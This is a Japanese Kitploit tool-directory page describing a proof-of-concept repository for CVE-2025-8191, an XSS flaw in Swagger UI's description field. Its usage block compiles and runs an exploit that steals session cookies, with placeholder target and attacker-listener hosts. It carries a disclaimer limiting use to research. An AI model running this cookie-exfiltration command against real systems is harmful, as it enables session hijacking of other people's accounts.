Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8191 — Swagger UIにおけるCVE‑2025‑8191のPoCエクスプロイトを含むリポジトリ。XSSインジェクションを利用してセッションCookieを外部に送信します。 | Kitploit
ツール/GitHubGitHub/bytereaper77/cve-2025-8191
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育Archived
GitHubbytereaper77/cve-2025-8191

CVE-2025-8191

Swagger UIにおけるCVE‑2025‑8191のPoCエクスプロイトを含むリポジトリ。XSSインジェクションを利用してセッションCookieを外部に送信します。

リポジトリを見る
211年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-8191 – Swagger UI XSS インジェクション

説明 :

このリポジトリには、Swagger UI で見つかった脆弱性 CVE-2025-8191 の Proof of Concept (PoC) エクスプロイトが含まれています。

この脆弱性により、"description" フィールドでのクロスサイトスクリプティング (XSS) インジェクションが可能となり、Swagger UI バージョン ≤ 1.0.3 でリモートスクリプト実行が引き起こされます。

参考 :

  • NVD エントリ: https://nvd.nist.gov/vuln/detail/CVE-2025-8191

使用方法 :

root@kitploit:~
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v 

http://target.com をターゲットの Swagger UI URL に、http://yourserver.com をデータ流出用の HTTP リスナーに置き換えてください。

免責事項 :

このコードは教育およびセキュリティ研究目的のみに提供されます。明示的な許可がないシステムでは使用しないでください。著者は誤用に対する責任を負いません。

ライセンス :

MIT ライセンス

ツールをダウンロード